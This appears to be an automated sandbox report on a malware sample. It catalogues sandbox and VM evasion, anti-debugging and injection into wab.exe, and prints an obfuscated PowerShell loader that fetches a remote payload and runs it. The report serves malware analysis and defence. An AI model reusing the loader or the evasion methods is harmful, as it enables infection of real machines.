Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Check if machine is in data center or colocation facility
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2DF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22F60000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22DE0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599157 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599046 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598935 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597686 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597356 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596120 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595768 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595526 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595157 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595041 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594797 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594655 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594438 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594105 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 593976 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4566 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5244 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7223 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2620 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4211 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5578 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4824 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep count: 7223 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep count: 2620 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 820 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5268 Thread sleep count: 4211 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5268 Thread sleep count: 5578 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599657s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599532s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599407s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599282s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599157s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -599046s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598935s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598828s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598360s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -598110s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597985s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597860s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597686s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597577s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597356s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -99891s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596735s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596120s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -596000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595891s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595768s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595641s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595526s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595407s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595282s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595157s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -595041s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594922s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594797s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594655s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594547s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594438s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594328s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594219s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -594105s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2744 Thread sleep time: -593976s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599157 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599046 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598935 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597686 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597577 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597356 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596120 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595768 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595526 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595407 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595282 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595157 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595041 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594797 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594655 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594438 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594105 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 593976 Jump to behavior
Source: wscript.exe, 00000001.00000003.1607028862.0000024CD103A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\a
Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWre
Source: wscript.exe, 00000001.00000003.1606786959.0000024CD121E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: wscript.exe, 00000001.00000002.1609069446.0000024CD10F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2273064994.00000250D4409000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_02DF7ED0 CheckRemoteDebuggerPresent, 11_2_02DF7ED0
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_02DFF568 LdrInitializeThunk, 11_2_02DFF568
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4260000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2DFFD38 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. 